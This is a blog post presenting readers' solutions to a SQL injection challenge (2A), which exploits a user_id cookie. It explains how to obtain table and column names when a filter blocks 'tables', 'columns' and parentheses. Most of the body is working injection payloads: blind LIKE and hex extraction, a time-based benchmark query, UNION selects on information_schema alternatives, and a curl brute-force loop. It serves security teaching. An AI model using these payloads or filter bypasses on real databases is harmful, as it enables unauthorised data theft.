Solutions for challenge 2A

Solutions for challenge 2A

Posted on July 12, 2012 by Roberto Salgado

After receiving many submissions for the SQL Injection challenge 2A, I decided it was time to show some of the solutions used to solve this challenge. In case you missed out on the series of SQL Injection challenges I released a few months ago, they are currently still online and available to try out. There are 3 challenges, each with part A and B. Out of all the challenges, challenge 2A ended up being one of the easier ones and since the solutions didn't vary too much, I decided to pick this challenge to be the first to show the solutions to.

 

Explanation

DISCLAIMER: If you haven't tried this challenge, it is still available here in case you want to give it a shot before reading the SOLUTIONS below.

What differentiates this challenge from the other challenges is that it allows you to log in as guest. In doing so, a welcome message is displayed showing the username and privileges and the cookie user_id is created. The cookie user_id, as the name says, has the id of the user, which in the case of guest is 1. If the value of the cookie is changed to 0, the message will now display admin as the username with administrator privileges. This is an indication that the username and privileges are determined from the user_id cookie, which is of course pulling that information from the MySQL database. Now that we know the injection point is in the cookie user_id, the next step is to figure out which characters are allowed and which are filtered.

The main idea behind this challenge is to figure out a way to retrieve the table/column names without using information_schema.tables/columns. For this reason, I decided to use very little filtering. Initially I had only blacklisted the following characters:

$blacklist = array('tables', 'columns', '(', ')');

Many WAF's rely on blocking the keywords 'tables' and 'columns', so I wanted to demonstrate that an attacker doesn't need those keywords in order the obtain the table/column names; I later added mysql_real_escape_string() as an extra layer of difficulty. Basically there are several other tables we can obtain the table/column names from other than information_schema.tables/columns, which are the two widely known ones. The only condition is that some require that the table/column have a key, and since each table should have a primary key, chances are high that this will work. Some examples are:

information_schema.key_column_usage

information_schema.table_constraints

information_schema.statistics

information_schema.partitions

Some of the solutions I received used a method I had not anticipated when writing the challenge. This type of solution guessed the column name and extracted the password through a blind SQLi. In hindsight I should have added a prefix to the column names, so they couldn't be guessed as easily. However, I did learn something because of it: I knew the LIKE statement doesn't require quotations, what I didn't know is that you could use the wildcards % and ? without the quotations. Below are the solutions that were submitted:

 

Solutions

Raz0r/BlackFan:

Solution omitted as it can be used to solve challenge 2B.

First Category

FluxReiners:

user_id=0 and username='admin' and mid(password,1,1)='e'

Team Rebel:

user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))

p____h:

user_id=0 and password LIKE "el%uitas"

NULL Life:

Submitted a PHP script found here.

mortis:

user_id=0 and username=0x656c25

tlk:

user_id=-1 OR password LIKE BINARY 0x{chars}25

g4mm4:

user_id=0 and password like binary 0x456c25

Submitted a Python script found here.

w00d:

user_id=0 and password like 0x[blind-here]25

gijs:

userid=0 and password >= BINARY 0x41

Karion:

for i in {2,3,4,5}; do for j in {0,1,2,3,4,5,6,7,8,9,0,A,B,C,D,E,F,G} ; do echo $i$j ; curl http://50.57.51.240/challenges/2A/challenge.php -b "user_id=0 and password LIKE 0x454C5F564552475549544153${i}${j}25" 2>&1 | grep ADMIN ;done ;done

Second Category

Sebastien Blot:

userid=-1+union+select+1,2,table_name,4+from+information_schema.key_column_usage+limit+2,1--

Miroslav Stampar:

user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3

Paul da Silva:

userid=-1 union select null,COLUMN_NAME,TABLE_NAME,null from information_schema.KEY_COLUMN_USAGE where table_name<>0x7265676c6173 and table_name<>0x72756c6573 limit 0,1-- 

Dominus:

user_id=0+and+0=1+union+select+1,2,table_name,4+from+information_schema.statistics+limit+2,1 

 

A full list of the victors for each challenge is available here.


Latest Blog Entries

Panoptic
An overview of Panoptic, an open source penetration testing tool that automates the process of search and retrieval of common log and config files through LFI vulnerabilities.

Special discount code for "Nmap 6: Network Exploration and Security Auditing Cookbook"
PacktPub created a special discount code for our friends from HackerHalted

Mac2WepKey HHG5xx for iPhone
The famous app to obtain the default WiFi passwords for Huawei routers is now available for the iPhone iOS 5.

Latest News

Jun 18, 2014
Websec present at Campus Party 2014

Websec will be participating with four conferences at the largest Campus Party ever held, which will take place from the 24-29 of June in Guadalajara, Mexico.

Oct 01, 2013
Websec at DerbyCon 2013
A summary of Websec's participation at DerbyCon 2013 in Louisville, Kentucky.